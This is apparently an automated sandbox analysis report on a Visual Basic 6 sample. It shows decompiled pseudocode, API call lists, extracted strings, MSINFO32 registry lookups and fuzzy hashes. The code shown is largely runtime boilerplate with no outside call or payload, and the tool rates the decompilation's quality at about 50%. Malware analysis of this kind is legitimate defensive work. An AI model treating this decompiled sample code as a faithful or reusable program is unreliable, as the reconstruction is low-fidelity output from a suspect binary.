					_t146 =  *((intOrPtr*)( *_v124));
					_t109 =  &_v44;
					L004014A8();
					_v88 = _t109;
					_t113 =  *((intOrPtr*)( *_v88 + 0x60))(_v88,  &_v84, _t109,  *((intOrPtr*)(_t146 + 0x300))( *_v124));
					asm("fclex");
					_v92 = _t113;
					if(_v92 >= 0) {
						_v128 = _v128 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x403cfc);
						_push(_v88);
						_push(_v92);
						L00401574();
						_v128 = _t113;
					}
					asm("fild dword [ebp-0x50]");
					_v136 = _t173;
					_v140 = _v136 *  *0x4012e0;
					 *_t161 = _v140;
					_t105 =  *((intOrPtr*)( *_a4 + 0x84))(_a4, _t146);
					asm("fclex");
					_v96 = _t105;
					if(_v96 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x84);
						_push(0x4033e4);
						_push(_a4);
						_push(_v96);
						L00401574();
						_v144 = _t105;
					}
					L00401562();
				}
				_v28 = 0x4d7c;
				asm("wait");
				_push(0x4165ce);
				L00401532();
				L00401562();
				L00401562();
				return _t105;
			}

0x004162c2
0x004162c7
0x004162d2
0x004162d3
0x004162dc
0x004162dd
0x004162e5
0x004162e8
0x004162f5
0x004162fa
0x004162ff
0x00416307
0x00416309
0x0041630b
0x00416313
0x00416314
0x0041631b
0x0041631c
0x00416326
0x00416327
0x00416328
0x00416329
0x0041632a
0x0041632c
0x0041632f
0x00416337
0x00416337
0x0041633c
0x00416341
0x0041634b
0x00416350
0x00416351
0x00416356
0x0041635d
0x00416363
0x0041636a
0x00416375
0x00416382
0x0041639c
0x00416384
0x00416384
0x00416389
0x0041638e
0x00416393
0x00416393
0x004163a3
0x004163a8
0x004163b7
0x004163ba
0x004163bc
0x004163c3
0x004163dc
0x004163c5
0x004163c5
0x004163c7
0x004163cc
0x004163cf
0x004163d2
0x004163d7
0x004163d7
0x004163e3
0x004163e6
0x004163ed
0x004163fb
0x00416405
0x00416406
0x00416407
0x00416408
0x00416411
0x00416414
0x00416416
0x0041641d
0x00416436
0x0041641f
0x0041641f
0x00416421
0x00416426
0x00416429
0x0041642c
0x00416431
0x00416431
0x0041643d
0x00416440
0x00416444
0x0041644a
0x0041644b
0x00416453
0x00416453
0x00416458
0x0041645f
0x0041646c
0x00416471
0x00416474
0x00416475
0x00416485
0x0041648c
0x00416491
0x00416497
0x004164a4
0x004164be
0x004164a6
0x004164a6
0x004164ab
0x004164b0
0x004164b5
0x004164b5
0x004164cf
0x004164d9
0x004164dd
0x004164e2
0x004164f1
0x004164f4
0x004164f6
0x004164fd
0x00416516
0x004164ff
0x004164ff
0x00416501
0x00416506
0x00416509
0x0041650c
0x00416511
0x00416511
0x0041651a
0x0041651d
0x0041652f
0x0041653c
0x00416547
0x0041654d
0x0041654f
0x00416556
0x00416575
0x00416558
0x00416558
0x0041655d
0x00416562
0x00416565
0x00416568
0x0041656d
0x0041656d
0x0041657f
0x0041657f
0x00416584
0x0041658a
0x0041658b
0x004165b8
0x004165c0
0x004165c8
0x004165cd

APIs

__vbaChkstk.MSVBVM60(?,00401316), ref: 004162DD
__vbaStrCopy.MSVBVM60(?,?,?,?,00401316), ref: 004162F5
__vbaLenBstr.MSVBVM60(004040F4,?,?,?,?,00401316), ref: 004162FF
#716.MSVBVM60(?,YPPERSTEPRSTINDERNE,00000000,004040F4,?,?,?,?,00401316), ref: 00416314
__vbaChkstk.MSVBVM60(?,YPPERSTEPRSTINDERNE,00000000,004040F4,?,?,?,?,00401316), ref: 0041631C
__vbaLateIdSt.MSVBVM60(?,00000000,?,YPPERSTEPRSTINDERNE,00000000,004040F4,?,?,?,?,00401316), ref: 0041632F
__vbaFreeVar.MSVBVM60(?,00000000,?,YPPERSTEPRSTINDERNE,00000000,004040F4,?,?,?,?,00401316), ref: 00416337
#521.MSVBVM60(00403F50,004040F4,?,?,?,?,00401316), ref: 00416341
__vbaStrMove.MSVBVM60(00403F50,004040F4,?,?,?,?,00401316), ref: 0041634B
__vbaStrCmp.MSVBVM60(00403F5C,00000000,00403F50,004040F4,?,?,?,?,00401316), ref: 00416356
__vbaFreeStr.MSVBVM60(00403F5C,00000000,00403F50,004040F4,?,?,?,?,00401316), ref: 0041636A
__vbaNew2.MSVBVM60(00403C34,00417360,00403F5C,00000000,00403F50,004040F4,?,?,?,?,00401316), ref: 0041638E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C24,0000004C), ref: 004163D2
__vbaChkstk.MSVBVM60(?), ref: 004163FB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403F10,0000001C), ref: 0041642C
__vbaObjSet.MSVBVM60(?,?), ref: 0041644B
__vbaFreeObj.MSVBVM60(?,?), ref: 00416453
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,00403F5C,00000000,00403F50,004040F4), ref: 0041646C
#557.MSVBVM60(?,?,?,?,?,?,?,?,?,00403F5C,00000000,00403F50,004040F4), ref: 00416475
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,00403F5C,00000000,00403F50,004040F4), ref: 0041648C
__vbaNew2.MSVBVM60(00404410,00417010,?,?,?,?,?,?,?,?,?,00403F5C,00000000,00403F50,004040F4), ref: 004164B0
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004164DD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000060,?,?,?,?,?,?,?,?,?,?,?), ref: 0041650C
__vbaHresultCheckObj.MSVBVM60(00000000,?,004033E4,00000084,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00416568
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041657F
__vbaFreeStr.MSVBVM60(004165CE,?,?,?,?,?,?,?,?,?,00403F5C,00000000,00403F50,004040F4), ref: 004165B8
__vbaFreeObj.MSVBVM60(004165CE,?,?,?,?,?,?,?,?,?,00403F5C,00000000,00403F50,004040F4), ref: 004165C0
__vbaFreeObj.MSVBVM60(004165CE,?,?,?,?,?,?,?,?,?,00403F5C,00000000,00403F50,004040F4), ref: 004165C8

Strings

2/2/2, xrefs: 00416458
|M, xrefs: 00416584
YPPERSTEPRSTINDERNE, xrefs: 0041630B
`sA, xrefs: 004163A3

Memory Dump Source

Source File: 0000000C.00000002.420603886.0000000000411000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.420579967.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.420585928.0000000000401000.00000020.00020000.sdmp Download File
Associated: 0000000C.00000002.420619483.0000000000417000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.420630488.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ota.jbxd

Similarity

API ID: __vba$Free$CheckHresult$Chkstk$New2$#521#557#716BstrCopyLateMove
String ID: 2/2/2$YPPERSTEPRSTINDERNE$`sA$|M
API String ID: 4252558186-1424485835
Opcode ID: b0f757d9fd7d46b74a4f595151772cc513c3cd2d787366b9deb267d4a0ba75a7
Instruction ID: cc8d2e3a1bf2bb15bd587b3bfe46bef3f37a45af1003bf1e37f9b7c22d379655
Opcode Fuzzy Hash: b0f757d9fd7d46b74a4f595151772cc513c3cd2d787366b9deb267d4a0ba75a7
Instruction Fuzzy Hash: 03910770D00209AFDB10EFE1D846BDDBBB5BF48704F20842AE502BB1A5DB799985DF18

Uniqueness

Uniqueness Score: -1.00%

Function 00411531, Relevance: 52.7, APIs: 24, Strings: 6, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00411531(void* __ebx, void* __edi, void* __esi, long long __fp0, intOrPtr* _a4) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v56;
				char _v64;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				intOrPtr _v104;
				char _v112;
				char* _v120;
				char _v128;
				void* _v180;
				char _v184;
				long long _v192;
				signed int _v196;
				short _v200;
				signed int _v220;
				signed int _v224;
				signed int _t101;
				signed int _t113;
				short _t117;
				char* _t125;
				signed int _t126;
				void* _t152;
				void* _t154;
				intOrPtr _t155;
				long long _t161;

				_t161 = __fp0;
				_t155 = _t154 - 0x14;
				 *[fs:0x0] = _t155;
				L00401310();
				_v24 = _t155;
				_v20 = 0x4011c0;
				_v16 = 0;
				_v12 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401316, _t152);
				L0040155C();
				L00401556();
				L00401556();
				_v184 = 0x80000002;
				_t101 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v184,  &_v44,  &_v48,  &_v40,  &_v180, 1);
				_v196 = _t101;
				if(_v196 >= 0) {
					_v220 = _v220 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x403414);
					_push(_a4);
					_push(_v196);
					L00401574();
					_v220 = _t101;
				}
				_v200 = _v180;
				_push( &_v48);
				_push( &_v44);
				_push(2);
				L00401550();
				if(_v200 == 0) {
					L00401556();
					L00401556();
					_v184 = 0x80000002;
					_t113 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v184,  &_v44,  &_v48,  &_v40,  &_v180);
					_v196 = _t113;
					if(_v196 >= 0) {
						_v224 = _v224 & 0x00000000;
					} else {
						_push(0x6fc);
						_push(0x403414);
						_push(_a4);
						_push(_v196);
						L00401574();
						_v224 = _t113;
					}
					_v200 = _v180;
					_push( &_v48);
					_push( &_v44);
					_push(2);
					L00401550();
					_t117 = _v200;
					if(_t117 == 0) {
						goto L15;
					} else {
						_push(_v40);
						_push(L"\\MSINFO32.EXE");
						L00401538();
						_v56 = _t117;
						_v64 = 8;
						_push(0);
						_t126 =  &_v64;
						_push(_t126);
						L0040153E();
						L00401544();
						_push(_t126);
						_push(0x403c68);
						L0040154A();
						asm("sbb eax, eax");
						_v196 =  ~( ~( ~_t126));
						L00401532();
						L0040152C();
						if(_v196 == 0) {
							L15:
							_v104 = 0x80020004;
							_v112 = 0xa;
							_v88 = 0x80020004;
							_v96 = 0xa;
							_v72 = 0x80020004;
							_v80 = 0xa;
							_v120 = L"System Information Is Unavailable At This Time";
							_v128 = 8;
							L0040151A();
							_push( &_v112);
							_push( &_v96);
							_push( &_v80);
							_push(0);
							_push( &_v64);
							L00401520();
							_push( &_v112);
							_push( &_v96);
							_push( &_v80);
							_t125 =  &_v64;
							_push(_t125);
							_push(4);
							L00401514();
						} else {
							_push(_v40);
							_push(L"\\MSINFO32.EXE");
							L00401538();
							L00401544();
							goto L14;
						}
					}
				} else {
					L14:
					_v120 =  &_v40;
					_v128 = 0x4008;
					_push(1);
					_t125 =  &_v128;
					_push(_t125);
					L00401526();
					_v192 = _t161;
				}
				L0040150E();
				asm("wait");
				_push(0x411837);
				L00401532();
				return _t125;
			}

0x00411531
0x00411534
0x00411543
0x0041154f
0x00411557
0x0041155a
0x00411561
0x00411568
0x00411577
0x0041157c
0x00411589
0x00411596
0x0041159b
0x004115c7
0x004115cd
0x004115da
0x004115fc
0x004115dc
0x004115dc
0x004115e1
0x004115e6
0x004115e9
0x004115ef
0x004115f4
0x004115f4
0x0041160a
0x00411614
0x00411618
0x00411619
0x0041161b
0x0041162c
0x0041163b
0x00411648
0x0041164d
0x00411679
0x0041167f
0x0041168c
0x004116ae
0x0041168e
0x0041168e
0x00411693
0x00411698
0x0041169b
0x004116a1
0x004116a6
0x004116a6
0x004116bc
0x004116c6
0x004116ca
0x004116cb
0x004116cd
0x004116d5
0x004116de
0x00000000
0x004116e0
0x004116e0
0x004116e3
0x004116e8
0x004116ed
0x004116f0
0x004116f7
0x004116f9
0x004116fc
0x004116fd
0x00411707
0x0041170c
0x0041170d
0x00411712
0x00411719
0x0041171f
0x00411729
0x00411731
0x0041173f
0x00411780
0x00411780
0x00411787
0x0041178e
0x00411795
0x0041179c
0x004117a3
0x004117aa
0x004117b1
0x004117be
0x004117c6
0x004117ca
0x004117ce
0x004117cf
0x004117d4
0x004117d5
0x004117dd
0x004117e1
0x004117e5
0x004117e6
0x004117e9
0x004117ea
0x004117ec
0x00411741
0x00411741
0x00411744
0x00411749
0x00411753
0x00000000
0x0041175c
0x0041173f
0x0041162e
0x00411760
0x00411763
0x00411766
0x0041176d
0x0041176f
0x00411772
0x00411773
0x00411778
0x00411778
0x004117f4
0x004117f9
0x004117fa
0x00411831
0x00411836

APIs

__vbaChkstk.MSVBVM60(?,00401316), ref: 0041154F
__vbaOnError.MSVBVM60(00000001,?,?,?,?,00401316), ref: 0041157C
__vbaStrCopy.MSVBVM60(00000001,?,?,?,?,00401316), ref: 00411589
__vbaStrCopy.MSVBVM60(00000001,?,?,?,?,00401316), ref: 00411596
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403414,000006FC), ref: 004115EF
__vbaFreeStrList.MSVBVM60(00000002,?,00000001), ref: 0041161B
__vbaStrCopy.MSVBVM60(?,?,00401316), ref: 0041163B
__vbaStrCopy.MSVBVM60(?,?,00401316), ref: 00411648
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403414,000006FC), ref: 004116A1
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004116CD
__vbaStrCat.MSVBVM60(\MSINFO32.EXE,?,?,?,?,?,?,00401316), ref: 004116E8
#645.MSVBVM60(00000008,00000000), ref: 004116FD
__vbaStrMove.MSVBVM60(00000008,00000000), ref: 00411707
__vbaStrCmp.MSVBVM60(00403C68,00000000,00000008,00000000), ref: 00411712
__vbaFreeStr.MSVBVM60(00403C68,00000000,00000008,00000000), ref: 00411729
__vbaFreeVar.MSVBVM60(00403C68,00000000,00000008,00000000), ref: 00411731
__vbaStrCat.MSVBVM60(\MSINFO32.EXE,?,00403C68,00000000,00000008,00000000), ref: 00411749
__vbaStrMove.MSVBVM60(\MSINFO32.EXE,?,00403C68,00000000,00000008,00000000), ref: 00411753
#600.MSVBVM60(00004008,00000001,?,?,?,?,?,?,?,?,?,?,\MSINFO32.EXE,?,00403C68,00000000), ref: 00411773
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00403C68,00000000,00000008,00000000), ref: 004117BE
#595.MSVBVM60(?,00000000,0000000A,0000000A,0000000A), ref: 004117D5
__vbaFreeVarList.MSVBVM60(00000004,?,0000000A,0000000A,0000000A,?,00000000,0000000A,0000000A,0000000A), ref: 004117EC
__vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401316), ref: 004117F4
__vbaFreeStr.MSVBVM60(00411837,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00411831

Strings

\MSINFO32.EXE, xrefs: 004116E3, 00411744
MSINFO, xrefs: 00411633
PATH, xrefs: 00411581
System Information Is Unavailable At This Time, xrefs: 004117AA
SOFTWARE\Microsoft\Shared Tools\MSINFO, xrefs: 0041158E
SOFTWARE\Microsoft\Shared Tools Location, xrefs: 00411640

Memory Dump Source

Source File: 0000000C.00000002.420603886.0000000000411000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.420579967.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.420585928.0000000000401000.00000020.00020000.sdmp Download File
Associated: 0000000C.00000002.420619483.0000000000417000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.420630488.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ota.jbxd

Similarity

API ID: __vba$Free$Copy$List$CheckHresultMove$#595#600#645ChkstkErrorExitProc
String ID: MSINFO$PATH$SOFTWARE\Microsoft\Shared Tools Location$SOFTWARE\Microsoft\Shared Tools\MSINFO$System Information Is Unavailable At This Time$\MSINFO32.EXE
API String ID: 2627723877-1377231373
Opcode ID: af222b5baaabb07eca84499171eb257e1e74877dac56143eade6784339b1b61f
Instruction ID: 9f6d139097fea143b969d2f27267867f4b3b48abcd30f1d0b279da1f9299119a
Opcode Fuzzy Hash: af222b5baaabb07eca84499171eb257e1e74877dac56143eade6784339b1b61f
Instruction Fuzzy Hash: 5E813D72D00208ABDB11EF91CC41FDEB7B8AF48704F10816BE516BB1A1DB799A45CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00415794, Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E00415794(void* __ebx, void* __ecx, void* __edi, void* __esi, char __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				char _v32;
				char _v36;
				intOrPtr _v44;
				char _v52;
				intOrPtr _v60;
				char _v68;
				intOrPtr _v76;
				intOrPtr _v84;
				intOrPtr _v92;
				char _v100;
				short _v104;
				void* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				char _v128;
				signed int _v132;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				intOrPtr* _v148;
				short _v152;
				char _v156;
				signed int _v160;
				signed int _t96;
				char* _t104;
				signed int _t108;
				char* _t112;
				signed int _t119;
				char* _t121;
				signed int _t127;
				signed int _t132;
				intOrPtr _t144;
				intOrPtr _t161;
				char _t171;

				_t171 = __fp0;
				_push(0x401316);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t161;
				L00401310();
				_v12 = _t161;
				_v8 = 0x4012a0;
				_v44 = 1;
				_v52 = 2;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_t96 =  &_v52;
				_push(_t96);
				L004013CA();
				L00401544();
				L0040152C();
				_push(0x404090);
				L004013C4();
				L00401544();
				_push(_t96);
				_push(0x40409c);
				L0040154A();
				asm("sbb eax, eax");
				_v108 =  ~( ~( ~_t96));
				L00401532();
				if(_v108 != 0) {
					if( *0x417360 != 0) {
						_v128 = 0x417360;
					} else {
						_push(0x417360);
						_push(0x403c34);
						L0040156E();
						_v128 = 0x417360;
					}
					_t14 =  &_v128; // 0x417360
					_v108 =  *((intOrPtr*)( *_t14));
					_t127 =  *((intOrPtr*)( *_v108 + 0x1c))(_v108,  &_v32);
					asm("fclex");
					_v112 = _t127;
					if(_v112 >= 0) {
						_v132 = _v132 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x403c24);
						_push(_v108);
						_push(_v112);
						L00401574();
						_v132 = _t127;
					}
					_v116 = _v32;
					_v60 = 0x80020004;
					_v68 = 0xa;
					L00401310();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t132 =  *((intOrPtr*)( *_v116 + 0x60))(_v116, L"TREKANTEN", 0x10);
					asm("fclex");
					_v120 = _t132;
					if(_v120 >= 0) {
						_v136 = _v136 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x403cec);
						_push(_v116);
						_push(_v120);
						L00401574();
						_v136 = _t132;
					}
					L00401562();
				}
				if( *0x417010 != 0) {
					_v140 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v140 = 0x417010;
				}
				_t104 =  &_v32;
				L004014A8();
				_v108 = _t104;
				_t108 =  *((intOrPtr*)( *_v108 + 0x110))(_v108,  &_v104, _t104,  *((intOrPtr*)( *((intOrPtr*)( *_v140)) + 0x314))( *_v140));
				asm("fclex");
				_v112 = _t108;
				if(_v112 >= 0) {
					_v144 = _v144 & 0x00000000;
				} else {
					_push(0x110);
					_push(0x403cdc);
					_push(_v108);
					_push(_v112);
					L00401574();
					_v144 = _t108;
				}
				if( *0x417010 != 0) {
					_v148 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v148 = 0x417010;
				}
				_t144 =  *((intOrPtr*)( *_v148));
				_t112 =  &_v36;
				L004014A8();
				_v116 = _t112;
				_v92 = 0x80020004;
				_v100 = 0xa;
				_v76 = 0x80020004;
				_v84 = 0xa;
				_v60 = 0x80020004;
				_v68 = 0xa;
				L00401310();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401310();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401310();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v104;
				asm("fild dword [ebp-0x94]");
				_v156 = _t171;
				_v100 = _v156;
				_t119 =  *((intOrPtr*)( *_v116 + 0x1cc))(_v116, _t144, 0x10, 0x10, 0x10, _t112,  *((intOrPtr*)(_t144 + 0x304))( *_v148));
				asm("fclex");
				_v120 = _t119;
				if(_v120 >= 0) {
					_v160 = _v160 & 0x00000000;
				} else {
					_push(0x1cc);
					_push(0x403cfc);
					_push(_v116);
					_push(_v120);
					L00401574();
					_v160 = _t119;
				}
				_push( &_v36);
				_t121 =  &_v32;
				_push(_t121);
				_push(2);
				L004014A2();
				asm("wait");
				_push(0x415aea);
				L00401532();
				return _t121;
			}

0x00415794
0x00415799
0x004157a4
0x004157a5
0x004157b1
0x004157b9
0x004157bc
0x004157c3
0x004157ca
0x004157d1
0x004157d3
0x004157d5
0x004157d7
0x004157d9
0x004157dc
0x004157dd
0x004157e7
0x004157ef
0x004157f4
0x004157f9
0x00415803
0x00415808
0x00415809
0x0041580e
0x00415815
0x0041581b
0x00415822
0x0041582d
0x0041583a
0x00415854
0x0041583c
0x0041583c
0x00415841
0x00415846
0x0041584b
0x0041584b
0x0041585b
0x00415860
0x0041586f
0x00415872
0x00415874
0x0041587b
0x00415894
0x0041587d
0x0041587d
0x0041587f
0x00415884
0x00415887
0x0041588a
0x0041588f
0x0041588f
0x0041589b
0x0041589e
0x004158a5
0x004158af
0x004158b9
0x004158ba
0x004158bb
0x004158bc
0x004158ca
0x004158cd
0x004158cf
0x004158d6
0x004158f2
0x004158d8
0x004158d8
0x004158da
0x004158df
0x004158e2
0x004158e5
0x004158ea
0x004158ea
0x004158fc
0x004158fc
0x00415908
0x00415925
0x0041590a
0x0041590a
0x0041590f
0x00415914
0x00415919
0x00415919
0x00415949
0x0041594d
0x00415952
0x00415961
0x00415967
0x00415969
0x00415970
0x0041598f
0x00415972
0x00415972
0x00415977
0x0041597c
0x0041597f
0x00415982
0x00415987
0x00415987
0x0041599d
0x004159ba
0x0041599f
0x0041599f
0x004159a4
0x004159a9
0x004159ae
0x004159ae
0x004159d4
0x004159de
0x004159e2
0x004159e7
0x004159ea
0x004159f1
0x004159f8
0x004159ff
0x00415a06
0x00415a0d
0x00415a17
0x00415a21
0x00415a22
0x00415a23
0x00415a24
0x00415a28
0x00415a32
0x00415a33
0x00415a34
0x00415a35
0x00415a39
0x00415a43
0x00415a44
0x00415a45
0x00415a46
0x00415a4b
0x00415a51
0x00415a57
0x00415a64
0x00415a6f
0x00415a75
0x00415a77
0x00415a7e
0x00415a9d
0x00415a80
0x00415a80
0x00415a85
0x00415a8a
0x00415a8d
0x00415a90
0x00415a95
0x00415a95
0x00415aa7
0x00415aa8
0x00415aab
0x00415aac
0x00415aae
0x00415ab6
0x00415ab7
0x00415ae4
0x00415ae9

APIs

__vbaChkstk.MSVBVM60(?,00401316), ref: 004157B1
#703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00401316), ref: 004157DD
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00401316), ref: 004157E7
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00401316), ref: 004157EF
#713.MSVBVM60(00404090,00000002,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00401316), ref: 004157F9
__vbaStrMove.MSVBVM60(00404090,00000002,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00401316), ref: 00415803
__vbaStrCmp.MSVBVM60(0040409C,00000000,00404090,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041580E
__vbaFreeStr.MSVBVM60(0040409C,00000000,00404090,00000002,000000FF,000000FE,000000FE,000000FE), ref: 00415822
__vbaNew2.MSVBVM60(00403C34,00417360,0040409C,00000000,00404090,00000002,000000FF,000000FE,000000FE,000000FE), ref: 00415846
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C24,0000001C,?,?,?,?,?,?,?,?,?,?,?,0040409C), ref: 0041588A
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,0040409C,00000000,00404090,00000002,000000FF), ref: 004158AF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CEC,00000060,?,?,?,?,?,?,?,?,?,?,?,0040409C), ref: 004158E5
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040409C,00000000,00404090), ref: 004158FC
__vbaNew2.MSVBVM60(00404410,00417010,0040409C,00000000,00404090,00000002,000000FF,000000FE,000000FE,000000FE), ref: 00415914
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041594D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000110), ref: 00415982
__vbaNew2.MSVBVM60(00404410,00417010), ref: 004159A9
__vbaObjSet.MSVBVM60(?,00000000), ref: 004159E2
__vbaChkstk.MSVBVM60(?,00000000), ref: 00415A17
__vbaChkstk.MSVBVM60(?,00000000), ref: 00415A28
__vbaChkstk.MSVBVM60(?,00000000), ref: 00415A39
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,000001CC,?,?,00000000), ref: 00415A90
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 00415AAE
__vbaFreeStr.MSVBVM60(00415AEA), ref: 00415AE4

Strings

`sA, xrefs: 0041585B
TREKANTEN, xrefs: 004158BD

Memory Dump Source

Source File: 0000000C.00000002.420603886.0000000000411000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.420579967.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.420585928.0000000000401000.00000020.00020000.sdmp Download File
Associated: 0000000C.00000002.420619483.0000000000417000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.420630488.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ota.jbxd

Similarity

API ID: __vba$ChkstkFree$CheckHresult$New2$Move$#703#713List
String ID: TREKANTEN$`sA
API String ID: 3505305416-792611262
Opcode ID: 6690e8e52aa85ac62b39afb3cacaa3d35e88dc224e2494f1f0be52a49b6c1e4f
Instruction ID: 4b02f5e3e84636e7874fb4aa41637dc9ae81a4ec2d0927be286e2c308cca6da6
Opcode Fuzzy Hash: 6690e8e52aa85ac62b39afb3cacaa3d35e88dc224e2494f1f0be52a49b6c1e4f
Instruction Fuzzy Hash: E2913470900618EFDB10DFA0C846BDDBBB5BF49304F20456AE506BB2A2CBB95985DF18

Uniqueness

Uniqueness Score: -1.00%

Function 004165EB, Relevance: 45.7, APIs: 22, Strings: 4, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E004165EB(void* __ebx, void* __ecx, void* __edi, void* __esi, long long __fp0, void* _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v56;
				char _v72;
				char _v88;
				char* _v112;
				intOrPtr _v120;
				intOrPtr _v128;
				char _v136;
				void* _v140;
				signed int _v144;
				intOrPtr* _v148;
				signed int _v152;
				signed int _v160;
				intOrPtr _v164;
				char _v168;
				signed int _v172;
				signed int _v176;
				intOrPtr* _v180;
				signed int _v184;
				signed int _v188;
				short _t106;
				signed int _t115;
				signed int _t120;
				signed int _t127;
				signed int _t132;
				signed int _t133;
				intOrPtr _t157;

				_push(0x401316);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t157;
				L00401310();
				_v12 = _t157;
				_v8 = 0x4012f8;
				L00401556();
				_v112 = L"9-9-9";
				_v120 = 8;
				L0040151A();
				_push( &_v72);
				_push( &_v88);
				L00401484();
				_v128 = 9;
				_v136 = 0x8002;
				_push( &_v88);
				_t106 =  &_v136;
				_push(_t106);
				L0040148A();
				_v140 = _t106;
				_push( &_v88);
				_push( &_v72);
				_push(2);
				L00401514();
				if(_v140 != 0) {
					_v112 = L"BRUNSTIGT";
					_v120 = 8;
					L0040151A();
					_push(2);
					_push( &_v72);
					L00401526();
					_v28 = __fp0;
					L0040152C();
				}
				if( *0x417360 != 0) {
					_v168 = 0x417360;
				} else {
					_push(0x417360);
					_push(0x403c34);
					L0040156E();
					_v168 = 0x417360;
				}
				_t28 =  &_v168; // 0x417360
				_v140 =  *((intOrPtr*)( *_t28));
				_t115 =  *((intOrPtr*)( *_v140 + 0x14))(_v140,  &_v56);
				asm("fclex");
				_v144 = _t115;
				if(_v144 >= 0) {
					_v172 = _v172 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x403c24);
					_push(_v140);
					_push(_v144);
					L00401574();
					_v172 = _t115;
				}
				_v148 = _v56;
				_t120 =  *((intOrPtr*)( *_v148 + 0x58))(_v148,  &_v52);
				asm("fclex");
				_v152 = _t120;
				if(_v152 >= 0) {
					_v176 = _v176 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x403e50);
					_push(_v148);
					_push(_v152);
					L00401574();
					_v176 = _t120;
				}
				_v160 = _v52;
				_v52 = _v52 & 0x00000000;
				L00401544();
				L00401562();
				if( *0x417360 != 0) {
					_v180 = 0x417360;
				} else {
					_push(0x417360);
					_push(0x403c34);
					L0040156E();
					_v180 = 0x417360;
				}
